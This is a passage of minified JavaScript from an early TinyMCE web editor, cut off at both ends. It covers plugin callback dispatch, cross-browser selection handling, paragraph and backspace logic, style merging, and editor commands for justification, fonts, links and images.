i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined'){if(eval(templateFunction+"(editor_id, element, command, user_interface, value);"))return true;}}templateFunction='TinyMCE_'+tinyMCE.settings['theme']+"_execCommand";if(eval("typeof("+templateFunction+")")!='undefined')return eval(templateFunction+"(editor_id, element, command, user_interface, value);");return false;};TinyMCE.prototype._getThemeFunction=function(suffix,skip_plugins){if(skip_plugins)return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;var themePlugins=tinyMCE.getParam('plugins','',true,',');var templateFunction;for(var i=themePlugins.length;i>=0;i--){templateFunction='TinyMCE_'+themePlugins[i]+suffix;if(eval("typeof("+templateFunction+")")!='undefined')return templateFunction;}return 'TinyMCE_'+tinyMCE.settings['theme']+suffix;};TinyMCE.prototype.isFunc=function(func_name){if(func_name==null||func_name=="")return false;return eval("typeof("+func_name+")")!="undefined";};TinyMCE.prototype.exec=function(func_name,args){var str=func_name+'(';for(var i=3;i<args.length;i++){str+='args['+i+']';if(i<args.length-1)str+=',';}str+=');';return eval(str);};TinyMCE.prototype.executeCallback=function(param,suffix,mode){switch(mode){case 0:var state=false;var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){tinyMCE.exec(func,this.executeCallback.arguments);state=true;}return state;case 1:var plugins=tinyMCE.getParam('plugins','',true,',');for(var i=0;i<plugins.length;i++){var func="TinyMCE_"+plugins[i]+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}}var func='TinyMCE_'+tinyMCE.settings['theme']+suffix;if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}var func=tinyMCE.getParam(param,'');if(tinyMCE.isFunc(func)){if(tinyMCE.exec(func,this.executeCallback.arguments))return true;}return false;}};TinyMCE.prototype.debug=function(){var msg="";var elm=document.getElementById("tinymce_debug");if(!elm){var debugDiv=document.createElement("div");debugDiv.setAttribute("className","debugger");debugDiv.className="debugger";debugDiv.innerHTML='\ Debug output:\ <textarea id="tinymce_debug" style="width: 100%; height: 300px" wrap="nowrap"></textarea>';document.body.appendChild(debugDiv);elm=document.getElementById("tinymce_debug");}var args=this.debug.arguments;for(var i=0;i<args.length;i++){msg+=args[i];if(i<args.length-1)msg+=', ';}elm.value+=msg+"\n";};function TinyMCEControl(settings){this.undoLevels=new Array();this.undoIndex=0;this.typingUndoIndex=-1;this.undoRedo=true;this.isTinyMCEControl=true;this.settings=settings;this.settings['theme']=tinyMCE.getParam("theme","default");this.settings['width']=tinyMCE.getParam("width",-1);this.settings['height']=tinyMCE.getParam("height",-1);};TinyMCEControl.prototype.repaint=function(){if(tinyMCE.isMSIE)return;this.getBody().style.display='none';this.getBody().style.display='block';};TinyMCEControl.prototype.switchSettings=function(){if(tinyMCE.configs.length>1&&tinyMCE.currentConfig!=this.settings['index']){tinyMCE.settings=this.settings;tinyMCE.currentConfig=this.settings['index'];}};TinyMCEControl.prototype.fixBrokenURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('mce_real_src');if(src&&src!="")elms[i].setAttribute("src",src);}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('mce_real_href');if(href&&href!="")elms[i].setAttribute("href",href);}};TinyMCEControl.prototype.convertAllRelativeURLs=function(){var body=this.getBody();var elms=body.getElementsByTagName("img");for(var i=0;i<elms.length;i++){var src=elms[i].getAttribute('src');if(src&&src!=""){src=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],src);elms[i].setAttribute("src",src);elms[i].setAttribute("mce_real_src",src);}}var elms=body.getElementsByTagName("a");for(var i=0;i<elms.length;i++){var href=elms[i].getAttribute('href');if(href&&href!=""){href=tinyMCE.convertRelativeToAbsoluteURL(tinyMCE.settings['base_href'],href);elms[i].setAttribute("href",href);elms[i].setAttribute("mce_real_href",href);}}};TinyMCEControl.prototype.getSelectedHTML=function(){if(tinyMCE.isSafari){return this.getRng().toString();}var elm=document.createElement("body");if(tinyMCE.isGecko)elm.appendChild(this.getRng().cloneContents());else elm.innerHTML=this.getRng().htmlText;return tinyMCE._cleanupHTML(this,this.contentDocument,this.settings,elm,this.visualAid);};TinyMCEControl.prototype.getBookmark=function(){var rng=this.getRng();if(tinyMCE.isSafari)return rng;if(tinyMCE.isMSIE)return rng;if(tinyMCE.isGecko)return rng.cloneRange();return null;};TinyMCEControl.prototype.moveToBookmark=function(bookmark){if(tinyMCE.isSafari){var sel=this.getSel().realSelection;sel.setBaseAndExtent(bookmark.startContainer,bookmark.startOffset,bookmark.endContainer,bookmark.endOffset);return true;}if(tinyMCE.isMSIE)return bookmark.select();if(tinyMCE.isGecko){var rng=this.getDoc().createRange();var sel=this.getSel();rng.setStart(bookmark.startContainer,bookmark.startOffset);rng.setEnd(bookmark.endContainer,bookmark.endOffset);sel.removeAllRanges();sel.addRange(rng);return true;}return false;};TinyMCEControl.prototype.getSelectedText=function(){if(tinyMCE.isMSIE){var doc=this.getDoc();if(doc.selection.type=="Text"){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText='';}else{var sel=this.getSel();if(sel&&sel.toString)selectedText=sel.toString();else selectedText='';}return selectedText;};TinyMCEControl.prototype.selectNode=function(node,collapse,select_text_node,to_start){if(!node)return;if(typeof(collapse)=="undefined")collapse=true;if(typeof(select_text_node)=="undefined")select_text_node=false;if(typeof(to_start)=="undefined")to_start=true;if(tinyMCE.isMSIE){var rng=this.getBody().createTextRange();try{rng.moveToElementText(node);if(collapse)rng.collapse(to_start);rng.select();}catch(e){}}else{var sel=this.getSel();if(!sel)return;if(tinyMCE.isSafari){sel.realSelection.setBaseAndExtent(node,0,node,node.innerText.length);if(collapse){if(to_start)sel.realSelection.collapseToStart();else sel.realSelection.collapseToEnd();}this.scrollToNode(node);return;}var rng=this.getDoc().createRange();if(select_text_node){var nodes=tinyMCE.getNodeTree(node,new Array(),3);if(nodes.length>0)rng.selectNodeContents(nodes[0]);else rng.selectNodeContents(node);}else rng.selectNode(node);if(collapse){if(!to_start&&node.nodeType==3){rng.setStart(node,node.nodeValue.length);rng.setEnd(node,node.nodeValue.length);}else rng.collapse(to_start);}sel.removeAllRanges();sel.addRange(rng);}this.scrollToNode(node);tinyMCE.selectedElement=null;if(node.nodeType==1)tinyMCE.selectedElement=node;};TinyMCEControl.prototype.scrollToNode=function(node){var pos=tinyMCE.getAbsPosition(node);var doc=this.getDoc();var scrollX=doc.body.scrollLeft+doc.documentElement.scrollLeft;var scrollY=doc.body.scrollTop+doc.documentElement.scrollTop;var height=tinyMCE.isMSIE?document.getElementById(this.editorId).style.pixelHeight:this.targetElement.clientHeight;if(!tinyMCE.settings['auto_resize']&&!(pos.absTop>scrollY&&pos.absTop<(scrollY-25+height)))this.contentWindow.scrollTo(pos.absLeft,pos.absTop-height+25);};TinyMCEControl.prototype.getBody=function(){return this.getDoc().body;};TinyMCEControl.prototype.getDoc=function(){return this.contentWindow.document;};TinyMCEControl.prototype.getWin=function(){return this.contentWindow;};TinyMCEControl.prototype.getSel=function(){if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return this.getDoc().selection;var sel=this.contentWindow.getSelection();if(tinyMCE.isSafari&&!sel.getRangeAt){var newSel=new Object();var doc=this.getDoc();function getRangeAt(idx){var rng=new Object();rng.startContainer=this.focusNode;rng.endContainer=this.anchorNode;rng.commonAncestorContainer=this.focusNode;rng.createContextualFragment=function(html){if(html.charAt(0)=='<'){var elm=doc.createElement("div");elm.innerHTML=html;return elm.firstChild;}return doc.createTextNode("UNSUPPORTED, DUE TO LIMITATIONS IN SAFARI!");};rng.deleteContents=function(){doc.execCommand("Delete",false,"");};return rng;}newSel.focusNode=sel.baseNode;newSel.focusOffset=sel.baseOffset;newSel.anchorNode=sel.extentNode;newSel.anchorOffset=sel.extentOffset;newSel.getRangeAt=getRangeAt;newSel.text=""+sel;newSel.realSelection=sel;newSel.toString=function(){return this.text;};return newSel;}return sel;};TinyMCEControl.prototype.getRng=function(){var sel=this.getSel();if(sel==null)return null;if(tinyMCE.isMSIE&&!tinyMCE.isOpera)return sel.createRange();if(tinyMCE.isSafari){var rng=this.getDoc().createRange();var sel=this.getSel().realSelection;rng.setStart(sel.baseNode,sel.baseOffset);rng.setEnd(sel.extentNode,sel.extentOffset);return rng;}return this.getSel().getRangeAt(0);};TinyMCEControl.prototype._insertPara=function(e){function isEmpty(para){function isEmptyHTML(html){return html.replace(new RegExp('[ \t\r\n]+','g'),'').toLowerCase()=="";}if(para.getElementsByTagName("img").length>0)return false;if(para.getElementsByTagName("table").length>0)return false;if(para.getElementsByTagName("hr").length>0)return false;var nodes=tinyMCE.getNodeTree(para,new Array(),3);for(var i=0;i<nodes.length;i++){if(!isEmptyHTML(nodes[i].nodeValue))return false;}return true;}var doc=this.getDoc();var sel=this.getSel();var win=this.contentWindow;var rng=sel.getRangeAt(0);var body=doc.body;var rootElm=doc.documentElement;var self=this;var blockName="P";var rngBefore=doc.createRange();rngBefore.setStart(sel.anchorNode,sel.anchorOffset);rngBefore.collapse(true);var rngAfter=doc.createRange();rngAfter.setStart(sel.focusNode,sel.focusOffset);rngAfter.collapse(true);var direct=rngBefore.compareBoundaryPoints(rngBefore.START_TO_END,rngAfter)<0;var startNode=direct?sel.anchorNode:sel.focusNode;var startOffset=direct?sel.anchorOffset:sel.focusOffset;var endNode=direct?sel.focusNode:sel.anchorNode;var endOffset=direct?sel.focusOffset:sel.anchorOffset;startNode=startNode.nodeName=="BODY"?startNode.firstChild:startNode;endNode=endNode.nodeName=="BODY"?endNode.firstChild:endNode;var startBlock=tinyMCE.getParentBlockElement(startNode);var endBlock=tinyMCE.getParentBlockElement(endNode);if(startBlock!=null){blockName=startBlock.nodeName;if(blockName=="TD"||blockName=="TABLE"||(blockName=="DIV"&&new RegExp('left|right','gi').test(startBlock.style.cssFloat)))blockName="P";}if(tinyMCE.getParentElement(startBlock,"OL,UL")!=null)return false;if((startBlock!=null&&startBlock.nodeName=="TABLE")||(endBlock!=null&&endBlock.nodeName=="TABLE"))startBlock=endBlock=null;var paraBefore=(startBlock!=null&&startBlock.nodeName==blockName)?startBlock.cloneNode(false):doc.createElement(blockName);var paraAfter=(endBlock!=null&&endBlock.nodeName==blockName)?endBlock.cloneNode(false):doc.createElement(blockName);if(/^(H[1-6])$/.test(blockName))paraAfter=doc.createElement("p");var startChop=startNode;var endChop=endNode;node=startChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;startChop=node;}while((node=node.previousSibling?node.previousSibling:node.parentNode));node=endChop;do{if(node==body||node.nodeType==9||tinyMCE.isBlockElement(node))break;endChop=node;}while((node=node.nextSibling?node.nextSibling:node.parentNode));if(startChop.nodeName=="TD")startChop=startChop.firstChild;if(endChop.nodeName=="TD")endChop=endChop.lastChild;if(startBlock==null){rng.deleteContents();sel.removeAllRanges();if(startChop!=rootElm&&endChop!=rootElm){rngBefore=rng.cloneRange();if(startChop==body)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);paraBefore.appendChild(rngBefore.cloneContents());if(endChop.parentNode.nodeName==blockName)endChop=endChop.parentNode;rng.setEndAfter(endChop);if(endChop.nodeName!="#text"&&endChop.nodeName!="BODY")rngBefore.setEndAfter(endChop);var contents=rng.cloneContents();if(contents.firstChild&&(contents.firstChild.nodeName==blockName||contents.firstChild.nodeName=="BODY"))paraAfter.innerHTML=contents.firstChild.innerHTML;else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";rng.deleteContents();rngAfter.deleteContents();rngBefore.deleteContents();paraAfter.normalize();rngBefore.insertNode(paraAfter);paraBefore.normalize();rngBefore.insertNode(paraBefore);}else{body.innerHTML="<"+blockName+"> </"+blockName+"><"+blockName+"> </"+blockName+">";paraAfter=body.childNodes[1];}this.selectNode(paraAfter,true,true);return true;}if(startChop.nodeName==blockName)rngBefore.setStart(startChop,0);else rngBefore.setStartBefore(startChop);rngBefore.setEnd(startNode,startOffset);paraBefore.appendChild(rngBefore.cloneContents());rngAfter.setEndAfter(endChop);rngAfter.setStart(endNode,endOffset);var contents=rngAfter.cloneContents();if(contents.firstChild&&contents.firstChild.nodeName==blockName){paraAfter.innerHTML=contents.firstChild.innerHTML;}else paraAfter.appendChild(contents);if(isEmpty(paraBefore))paraBefore.innerHTML=" ";if(isEmpty(paraAfter))paraAfter.innerHTML=" ";var rng=doc.createRange();if(!startChop.previousSibling&&startChop.parentNode.nodeName.toUpperCase()==blockName){rng.setStartBefore(startChop.parentNode);}else{if(rngBefore.startContainer.nodeName.toUpperCase()==blockName&&rngBefore.startOffset==0)rng.setStartBefore(rngBefore.startContainer);else rng.setStart(rngBefore.startContainer,rngBefore.startOffset);}if(!endChop.nextSibling&&endChop.parentNode.nodeName.toUpperCase()==blockName)rng.setEndAfter(endChop.parentNode);else rng.setEnd(rngAfter.endContainer,rngAfter.endOffset);rng.deleteContents();rng.insertNode(paraAfter);rng.insertNode(paraBefore);paraAfter.normalize();paraBefore.normalize();this.selectNode(paraAfter,true,true);return true;};TinyMCEControl.prototype._handleBackSpace=function(evt_type){var doc=this.getDoc();var sel=this.getSel();if(sel==null)return false;var rng=sel.getRangeAt(0);var node=rng.startContainer;var elm=node.nodeType==3?node.parentNode:node;if(node==null)return;if(elm&&elm.nodeName==""){var para=doc.createElement("p");while(elm.firstChild)para.appendChild(elm.firstChild);elm.parentNode.insertBefore(para,elm);elm.parentNode.removeChild(elm);var rng=rng.cloneRange();rng.setStartBefore(node.nextSibling);rng.setEndAfter(node.nextSibling);rng.extractContents();this.selectNode(node.nextSibling,true,true);}var para=tinyMCE.getParentBlockElement(node);if(para!=null&¶.nodeName.toLowerCase()=='p'&&evt_type=="keypress"){var htm=para.innerHTML;var block=tinyMCE.getParentBlockElement(node);if(htm==""||htm==" "||block.nodeName.toLowerCase()=="li"){var prevElm=para.previousSibling;while(prevElm!=null&&prevElm.nodeType!=1)prevElm=prevElm.previousSibling;if(prevElm==null)return false;var nodes=tinyMCE.getNodeTree(prevElm,new Array(),3);var lastTextNode=nodes.length==0?null:nodes[nodes.length-1];if(lastTextNode!=null)this.selectNode(lastTextNode,true,false,false);para.parentNode.removeChild(para);return true;}}return false;};TinyMCEControl.prototype._insertSpace=function(){return true;};TinyMCEControl.prototype.autoResetDesignMode=function(){if(!tinyMCE.isMSIE&&tinyMCE.settings['auto_reset_designmode']){var sel=this.getSel();if(!sel||!sel.rangeCount||sel.rangeCount==0)eval('try { this.getDoc().designMode = "On"; } catch(e) {}');}};TinyMCEControl.prototype.isDirty=function(){return this.startContent!=tinyMCE.trim(this.getBody().innerHTML)&&!tinyMCE.isNotDirty;};TinyMCEControl.prototype._mergeElements=function(scmd,pa,ch,override){if(scmd=="removeformat"){pa.className="";pa.style.cssText="";ch.className="";ch.style.cssText="";return;}var st=tinyMCE.parseStyle(tinyMCE.getAttrib(pa,"style"));var stc=tinyMCE.parseStyle(tinyMCE.getAttrib(ch,"style"));var className=tinyMCE.getAttrib(pa,"class");className+=" "+tinyMCE.getAttrib(ch,"class");if(override){for(var n in st){if(typeof(st[n])=='function')continue;stc[n]=st[n];}}else{for(var n in stc){if(typeof(stc[n])=='function')continue;st[n]=stc[n];}}tinyMCE.setAttrib(pa,"style",tinyMCE.serializeStyle(st));tinyMCE.setAttrib(pa,"class",tinyMCE.trim(className));ch.className="";ch.style.cssText="";ch.removeAttribute("class");ch.removeAttribute("style");};TinyMCEControl.prototype.setUseCSS=function(b){var doc=this.getDoc();try{doc.execCommand("useCSS",false,!b);}catch(ex){}try{doc.execCommand("styleWithCSS",false,b);}catch(ex){}};TinyMCEControl.prototype.execCommand=function(command,user_interface,value){var doc=this.getDoc();var win=this.getWin();var focusElm=this.getFocusElement();if(this.lastSafariSelection&&!new RegExp('mceStartTyping|mceEndTyping|mceBeginUndoLevel|mceEndUndoLevel|mceAddUndoLevel','gi').test(command)){this.moveToBookmark(this.lastSafariSelection);tinyMCE.selectedElement=this.lastSafariSelectedElement;}if(!tinyMCE.isMSIE&&!this.useCSS){this.setUseCSS(false);this.useCSS=true;}this.contentDocument=doc;if(tinyMCE._themeExecCommand(this.editorId,this.getBody(),command,user_interface,value))return;if(focusElm&&focusElm.nodeName=="IMG"){var align=focusElm.getAttribute('align');var img=command=="JustifyCenter"?focusElm.cloneNode(false):focusElm;switch(command){case "JustifyLeft":if(align=='left')img.removeAttribute('align');else img.setAttribute('align','left');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyCenter":img.removeAttribute('align');var div=tinyMCE.getParentElement(focusElm,"div");if(div&&div.style.textAlign=="center"){if(div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);}else{var div=this.getDoc().createElement("div");div.style.textAlign='center';div.appendChild(img);focusElm.parentNode.replaceChild(div,focusElm);}this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;case "JustifyRight":if(align=='right')img.removeAttribute('align');else img.setAttribute('align','right');var div=focusElm.parentNode;if(div&&div.nodeName=="DIV"&&div.childNodes.length==1&&div.parentNode)div.parentNode.replaceChild(img,div);this.selectNode(img);this.repaint();tinyMCE.triggerNodeChange();return;}}if(tinyMCE.settings['force_br_newlines']){var alignValue="";if(doc.selection.type!="Control"){switch(command){case "JustifyLeft":alignValue="left";break;case "JustifyCenter":alignValue="center";break;case "JustifyFull":alignValue="justify";break;case "JustifyRight":alignValue="right";break;}if(alignValue!=""){var rng=doc.selection.createRange();if((divElm=tinyMCE.getParentElement(rng.parentElement(),"div"))!=null)divElm.setAttribute("align",alignValue);else if(rng.pasteHTML&&rng.htmlText.length>0)rng.pasteHTML('<div align="'+alignValue+'">'+rng.htmlText+"</div>");tinyMCE.triggerNodeChange();return;}}}switch(command){case "mceRepaint":this.repaint();return true;case "mceStoreSelection":this.selectionBookmark=this.getBookmark();return true;case "mceRestoreSelection":this.moveToBookmark(this.selectionBookmark);return true;case "InsertUnorderedList":case "InsertOrderedList":var tag=(command=="InsertUnorderedList")?"ul":"ol";if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<"+tag+"><li> </li><"+tag+">");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "Strikethrough":if(tinyMCE.isSafari)this.execCommand("mceInsertContent",false,"<strike>"+this.getSelectedHTML()+"</strike>");else this.getDoc().execCommand(command,user_interface,value);tinyMCE.triggerNodeChange();break;case "mceSelectNode":this.selectNode(value);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=value;break;case "FormatBlock":if(value==null||value==""){var elm=tinyMCE.getParentElement(this.getFocusElement(),"p,div,h1,h2,h3,h4,h5,h6,pre,address");if(elm)this.execCommand("mceRemoveNode",false,elm);}else this.getDoc().execCommand("FormatBlock",false,value);tinyMCE.triggerNodeChange();break;case "mceRemoveNode":if(!value)value=tinyMCE.getParentElement(this.getFocusElement());if(tinyMCE.isMSIE){value.outerHTML=value.innerHTML;}else{var rng=value.ownerDocument.createRange();rng.setStartBefore(value);rng.setEndAfter(value);rng.deleteContents();rng.insertNode(rng.createContextualFragment(value.innerHTML));}tinyMCE.triggerNodeChange();break;case "mceSelectNodeDepth":var parentNode=this.getFocusElement();for(var i=0;parentNode;i++){if(parentNode.nodeName.toLowerCase()=="body")break;if(parentNode.nodeName.toLowerCase()=="#text"){i--;parentNode=parentNode.parentNode;continue;}if(i==value){this.selectNode(parentNode,false);tinyMCE.triggerNodeChange();tinyMCE.selectedNode=parentNode;return;}parentNode=parentNode.parentNode;}break;case "SetStyleInfo":var rng=this.getRng();var sel=this.getSel();var scmd=value['command'];var sname=value['name'];var svalue=value['value']==null?'':value['value'];var wrapper=value['wrapper']?value['wrapper']:"span";var parentElm=null;var invalidRe=new RegExp("^BODY|HTML$","g");var invalidParentsRe=tinyMCE.settings['merge_styles_invalid_parents']!=''?new RegExp(tinyMCE.settings['merge_styles_invalid_parents'],"gi"):null;if(tinyMCE.isMSIE){if(rng.item)parentElm=rng.item(0);else{var pelm=rng.parentElement();var prng=doc.selection.createRange();prng.moveToElementText(pelm);if(rng.htmlText==prng.htmlText||rng.boundingWidth==0){if(invalidParentsRe==null||!invalidParentsRe.test(pelm.nodeName))parentElm=pelm;}}}else{var felm=this.getFocusElement();if(sel.isCollapsed||(/td|tr|tbody|table/ig.test(felm.nodeName)&&sel.anchorNode==felm.parentNode))parentElm=felm;}if(parentElm&&!invalidRe.test(parentElm.nodeName)){if(scmd=="setstyle")tinyMCE.setStyleAttrib(parentElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(parentElm,sname,svalue);if(scmd=="removeformat"){parentElm.style.cssText='';tinyMCE.setAttrib(parentElm,'class','');}var ch=tinyMCE.getNodeTree(parentElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==parentElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}else{doc.execCommand("fontname",false,"#mce_temp_font#");var elementArray=tinyMCE.getElementsByAttributeValue(this.getBody(),"font","face","#mce_temp_font#");for(var x=0;x<elementArray.length;x++){elm=elementArray[x];if(elm){var spanElm=doc.createElement(wrapper);if(scmd=="setstyle")tinyMCE.setStyleAttrib(spanElm,sname,svalue);if(scmd=="setattrib")tinyMCE.setAttrib(spanElm,sname,svalue);if(scmd=="removeformat"){spanElm.style.cssText='';tinyMCE.setAttrib(spanElm,'class','');}if(elm.hasChildNodes()){for(var i=0;i<elm.childNodes.length;i++)spanElm.appendChild(elm.childNodes[i].cloneNode(true));}spanElm.setAttribute("mce_new","true");elm.parentNode.replaceChild(spanElm,elm);var ch=tinyMCE.getNodeTree(spanElm,new Array(),1);for(var z=0;z<ch.length;z++){if(ch[z]==spanElm)continue;if(scmd=="setstyle")tinyMCE.setStyleAttrib(ch[z],sname,'');if(scmd=="setattrib")tinyMCE.setAttrib(ch[z],sname,'');if(scmd=="removeformat"){ch[z].style.cssText='';tinyMCE.setAttrib(ch[z],'class','');}}}}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isNew=tinyMCE.getAttrib(elm,"mce_new")=="true";elm.removeAttribute("mce_new");if(elm.childNodes&&elm.childNodes.length==1&&elm.childNodes[0].nodeType==1){this._mergeElements(scmd,elm,elm.childNodes[0],isNew);continue;}if(elm.parentNode.childNodes.length==1&&!invalidRe.test(elm.nodeName)&&!invalidRe.test(elm.parentNode.nodeName)){if(invalidParentsRe==null||!invalidParentsRe.test(elm.parentNode.nodeName))this._mergeElements(scmd,elm.parentNode,elm,false);}}var nodes=doc.getElementsByTagName(wrapper);for(var i=nodes.length-1;i>=0;i--){var elm=nodes[i];var isEmpty=true;var tmp=doc.createElement("body");tmp.appendChild(elm.cloneNode(false));tmp.innerHTML=tmp.innerHTML.replace(new RegExp('style=""|class=""','gi'),'');if(new RegExp('<span>','gi').test(tmp.innerHTML)){for(var x=0;x<elm.childNodes.length;x++){if(elm.parentNode!=null)elm.parentNode.insertBefore(elm.childNodes[x].cloneNode(true),elm);}elm.parentNode.removeChild(elm);}}if(scmd=="removeformat")tinyMCE.handleVisualAid(this.getBody(),true,this.visualAid,this);tinyMCE.triggerNodeChange();break;case "FontName":this.getDoc().execCommand('FontName',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "FontSize":this.getDoc().execCommand('FontSize',false,value);if(tinyMCE.isGecko)window.setTimeout('tinyMCE.triggerNodeChange(false);',1);return;case "forecolor":this.getDoc().execCommand('forecolor',false,value);break;case "HiliteColor":if(tinyMCE.isGecko){this.setUseCSS(true);this.getDoc().execCommand('hilitecolor',false,value);this.setUseCSS(false);}else this.getDoc().execCommand('BackColor',false,value);break;case "Cut":case "Copy":case "Paste":var cmdFailed=false;eval('try {this.getDoc().execCommand(command, user_interface, value);} catch (e) {cmdFailed = true;}');if(tinyMCE.isOpera&&cmdFailed)alert('Currently not supported by your browser, use keyboard shortcuts instead.');if(tinyMCE.isGecko&&cmdFailed){if(confirm(tinyMCE.getLang('lang_clipboard_msg')))window.open('http://www.mozilla.org/editor/midasdemo/securityprefs.html','mceExternal');return;}else tinyMCE.triggerNodeChange();break;case "mceSetContent":if(!value)value="";value=tinyMCE._customCleanup(this,"insert_to_editor",value);tinyMCE._setHTML(doc,value);tinyMCE.setInnerHTML(doc.body,tinyMCE._cleanupHTML(this,doc,tinyMCE.settings,doc.body));tinyMCE.handleVisualAid(doc.body,true,this.visualAid,this);tinyMCE._setEventsEnabled(doc.body,false);return true;case "mceLink":var selectedText="";if(tinyMCE.isMSIE){var rng=doc.selection.createRange();selectedText=rng.text;}else selectedText=this.getSel().toString();if(!tinyMCE.linkElement){if((tinyMCE.selectedElement.nodeName.toLowerCase()!="img")&&(selectedText.length<=0))return;}var href="",target="",title="",onclick="",action="insert",style_class="";if(tinyMCE.selectedElement.nodeName.toLowerCase()=="a")tinyMCE.linkElement=tinyMCE.selectedElement;if(tinyMCE.linkElement!=null&&tinyMCE.getAttrib(tinyMCE.linkElement,'href')=="")tinyMCE.linkElement=null;if(tinyMCE.linkElement){href=tinyMCE.getAttrib(tinyMCE.linkElement,'href');target=tinyMCE.getAttrib(tinyMCE.linkElement,'target');title=tinyMCE.getAttrib(tinyMCE.linkElement,'title');onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');style_class=tinyMCE.getAttrib(tinyMCE.linkElement,'class');if(onclick=="")onclick=tinyMCE.getAttrib(tinyMCE.linkElement,'onclick');onclick=tinyMCE.cleanupEventStr(onclick);mceRealHref=tinyMCE.getAttrib(tinyMCE.linkElement,'mce_real_href');if(mceRealHref!="")href=mceRealHref;href=eval(tinyMCE.settings['urlconverter_callback']+"(href, tinyMCE.linkElement, true);");action="update";}if(this.settings['insertlink_callback']){var returnVal=eval(this.settings['insertlink_callback']+"(href, target, title, onclick, action, style_class);");if(returnVal&&returnVal['href'])tinyMCE.insertLink(returnVal['href'],returnVal['target'],returnVal['title'],returnVal['onclick'],returnVal['style_class']);}else{tinyMCE.openWindow(this.insertLinkTemplate,{href:href,target:target,title:title,onclick:onclick,action:action,className:style_class});}break;case "mceImage":var src="",alt="",border="",hspace="",vspace="",width="",height="",align="";var title="",onmouseover="",onmouseout="",action="insert";var img=tinyMCE.imgElement;if(tinyMCE.selectedElement!=null&&tinyMCE.selectedElement.nodeName.toLowerCase()=="img"){img=tinyMCE.selectedElement;tinyMCE.imgElement=img;}if(img){if(tinyMCE.getAttrib(img,'name').indexOf('mce_')==0)return;src=tinyMCE.getAttrib(img,'src');alt=tinyMCE.getAttrib(img,'alt');if(alt=="")alt=tinyMCE.getAttrib(img,'title');if(tinyMCE.isGecko){var w=img.style.width;if(w!=null&&w!="")img.setAttribute("width",w);var h=img.style.height;if(h!=null&&h!="")img.setAttribute("height",h);}border=tinyMCE.getAttrib(img,'border');hspace=tinyMCE.getAttrib(img,'hspace');vspace=tinyMCE.getAttrib(img,'vspace');width=tinyMCE.getAttrib(img,'width');height=tinyMCE.getAttrib(img,'height');align=tinyMCE.getAttrib(img,'align');onmouseover=tinyMCE.getAttrib(img,'onmouseover');onmouseout=tinyMCE.getAttrib(img,'onmouseout');title=tinyMCE.getAttrib(img,'title');if(tinyMCE.isMSIE){width=img.attributes['width'].specified?width:"";height=img.attributes['height'].specified?height:"";}onmouseover=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseover));onmouseout=tinyMCE.getImageSrc(tinyMCE.cleanupEventStr(onmouseout));mceRealSrc=tinyMCE.getAttrib(img,'mce_real_src');if(mceRealSrc!="")src=mceRealSrc;src=eval(tinyMCE.settings['urlconverter_callback']+"(src, img, true);");if(onmouseover!="")onmouseover=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseover, img, true);");if(onmouseout!="")onmouseout=eval(tinyMCE.settings['urlconverter_callback']+"(onmouseout, img, true);");action="update";}if(this.settings['insertimage_callback']){var returnVal=eval(this.settings['insertimage_callback']+"(src, alt, border, hspace, vspace, width, height, align, title, onmouseover, onmouseout, action);");if(returnVal&&returnVal['src'])tinyMCE.insertImage(returnVal['src'],returnVal['alt'],returnVal['border'],returnVal['hspace'],returnVal['vspace'],returnVal['width'],returnVal['height'],returnVal['align'],returnVal['title'],returnVal['onmouseover'],returnVal['onmouseout']);}else tinyMCE.openWindow(this.insertImageTemplate,{src:src,alt:alt,border:border,hspace:hspace,vspace:vspace,width:width,height:height,align:align,title:title,onmouseover:onmouseover,onmouseout:onmouseout,action:action});break;case 